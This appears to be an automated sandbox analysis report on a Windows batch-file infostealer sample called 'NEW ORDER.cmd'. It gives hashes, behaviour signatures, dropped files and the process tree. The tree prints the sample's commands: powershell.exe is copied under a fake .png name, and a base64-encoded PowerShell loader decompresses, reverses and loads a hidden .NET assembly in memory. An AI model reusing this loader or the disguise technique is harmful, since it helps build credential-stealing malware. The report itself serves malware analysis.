Analysis

  • max time kernel
    142s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-10-2023 20:46

General

  • Target

    NEW ORDER.cmd

  • Size

    1.7MB

  • MD5

    546a223f6646e33809e9b2ef29df5c46

  • SHA1

    a754082ee814e7dc4d33e16f68972e4cd969f4a2

  • SHA256

    473a0251276e0b7260698c7a9cc879c935dc35f138b5243faa5721830dd79299

  • SHA512

    d75b0a2a5bddb1d8be2091987f57df4c8b3e381761cd9701adbcc561a51b2be7ce165f55788a54e5c21b2c3e041db265965f72211be1e65ec4a6863592391749

  • SSDEEP

    24576:NNn9wdn6DtyQBpICuGreBd8qohFj3DlF5mVoUBAKDHlhuQYTEddFqwuaA/BliTUM:T2td0esLhF5GHlwQN6wJWKExlq

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.cmd"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3364
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo F "
        3⤵
          PID:5096
        • C:\Windows\system32\xcopy.exe
          xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Ysrph.png
          3⤵
            PID:3344
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo F "
            3⤵
              PID:2624
            • C:\Windows\system32\xcopy.exe
              xcopy /d /q /y /h /i "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.cmd" C:\Users\Admin\AppData\Local\Temp\Ysrph.png.bat
              3⤵
                PID:5088
              • C:\Users\Admin\AppData\Local\Temp\Ysrph.png
                C:\Users\Admin\AppData\Local\Temp\Ysrph.png -win 1 -enc JABVAGMAbwBmAHoAIAA9ACAAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlACkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIALgBiAGEAdAAiACkALAAgAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0AbABhAHMAdAAgADEAOwAgACQARQBlAGMAaQBoAGgAaAB2AGQAaQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABVAGMAbwBmAHoAKQA7ACQAVwBmAGQAdwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABFAGUAYwBpAGgAaABoAHYAZABpACAAKQA7ACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAEIAaAB0AHYAegBtAHEAdAB1AGkAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABXAGYAZAB3AHkALAAgACgAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAEIAaAB0AHYAegBtAHEAdAB1AGkAZAAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAQgBoAHQAdgB6AG0AcQB0AHUAaQBkAC4AQwBsAG8AcwBlACgAKQA7ACQAVwBmAGQAdwB5AC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQARQBlAGMAaQBoAGgAaAB2AGQAaQAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABFAGUAYwBpAGgAaABoAHYAZABpACkAOwAgACQAVAB5AHYAcABxAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABFAGUAYwBpAGgAaABoAHYAZABpACkAOwAgACQAUgBjAGMAegBtAHUAaAB5AGQAdQAgAD0AIAAkAFQAeQB2AHAAcQBsAHMALgBHAGUAdABFAHgAcABvAHIAdABlAGQAVAB5AHAAZQBzACgAKQBbADAAXQA7ACAAJABQAGgAbgBwAGQAaQBjACAAPQAgACQAUgBjAGMAegBtAHUAaAB5AGQAdQAuAEcAZQB0AE0AZQB0AGgAbwBkAHMAKAApAFsAMABdAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=
                3⤵
                • Executes dropped EXE
                • Accesses Microsoft Outlook profiles
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • outlook_office_path
                • outlook_win_path
                PID:4584

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\Ysrph.png

            Filesize

            442KB

            MD5

            04029e121a0cfa5991749937dd22a1d9

            SHA1

            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

            SHA256

            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

            SHA512

            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          • C:\Users\Admin\AppData\Local\Temp\Ysrph.png.bat

            Filesize

            1.7MB

            MD5

            546a223f6646e33809e9b2ef29df5c46

            SHA1

            a754082ee814e7dc4d33e16f68972e4cd969f4a2

            SHA256

            473a0251276e0b7260698c7a9cc879c935dc35f138b5243faa5721830dd79299

            SHA512

            d75b0a2a5bddb1d8be2091987f57df4c8b3e381761cd9701adbcc561a51b2be7ce165f55788a54e5c21b2c3e041db265965f72211be1e65ec4a6863592391749

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_itmvms1m.cj5.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/4584-10-0x0000011ECD7D0000-0x0000011ECD7F2000-memory.dmp

            Filesize

            136KB

          • memory/4584-19-0x00007FFBC92C0000-0x00007FFBC9D81000-memory.dmp

            Filesize

            10.8MB

          • memory/4584-21-0x0000011ECB750000-0x0000011ECB760000-memory.dmp

            Filesize

            64KB

          • memory/4584-20-0x0000011ECB750000-0x0000011ECB760000-memory.dmp

            Filesize

            64KB

          • memory/4584-22-0x0000011ECB750000-0x0000011ECB760000-memory.dmp

            Filesize

            64KB

          • memory/4584-23-0x0000011ECDBB0000-0x0000011ECDD0A000-memory.dmp

            Filesize

            1.4MB

          • memory/4584-24-0x0000011ECDD10000-0x0000011ECDD8A000-memory.dmp

            Filesize

            488KB

          • memory/4584-25-0x0000011ECDE90000-0x0000011ECDEF6000-memory.dmp

            Filesize

            408KB

          • memory/4584-26-0x0000011ECDEF0000-0x0000011ECDFC5000-memory.dmp

            Filesize

            852KB

          • memory/4584-27-0x0000011ECE0A0000-0x0000011ECE170000-memory.dmp

            Filesize

            832KB

          • memory/4584-28-0x0000011ECB750000-0x0000011ECB760000-memory.dmp

            Filesize

            64KB

          • memory/4584-30-0x0000011ECE170000-0x0000011ECE278000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-29-0x0000011ECB750000-0x0000011ECB760000-memory.dmp

            Filesize

            64KB

          • memory/4584-31-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-32-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-34-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-36-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-38-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-40-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-42-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-44-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-46-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-48-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-50-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-52-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-54-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-56-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-58-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-60-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-62-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-64-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-66-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-68-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-70-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-72-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-74-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-76-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-78-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-80-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-82-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-84-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-86-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-88-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-90-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-92-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-94-0x0000011ECE170000-0x0000011ECE274000-memory.dmp

            Filesize

            1.0MB

          • memory/4584-264-0x00007FFBC92C0000-0x00007FFBC9D81000-memory.dmp

            Filesize

            10.8MB

          • memory/4584-493-0x0000011ECB750000-0x0000011ECB760000-memory.dmp

            Filesize

            64KB

          • memory/4584-495-0x0000011ECB750000-0x0000011ECB760000-memory.dmp

            Filesize

            64KB

          • memory/4584-1195-0x0000011ECB750000-0x0000011ECB760000-memory.dmp

            Filesize

            64KB

          • memory/4584-2207-0x0000011ECE280000-0x0000011ECE31E000-memory.dmp

            Filesize

            632KB

          • memory/4584-2208-0x0000011ECE320000-0x0000011ECE36C000-memory.dmp

            Filesize

            304KB

          • memory/4584-2209-0x0000011ECE370000-0x0000011ECE396000-memory.dmp

            Filesize

            152KB

          • memory/4584-2228-0x0000011ECE3D0000-0x0000011ECE44A000-memory.dmp

            Filesize

            488KB

          • memory/4584-2257-0x00007FFBC92C0000-0x00007FFBC9D81000-memory.dmp

            Filesize

            10.8MB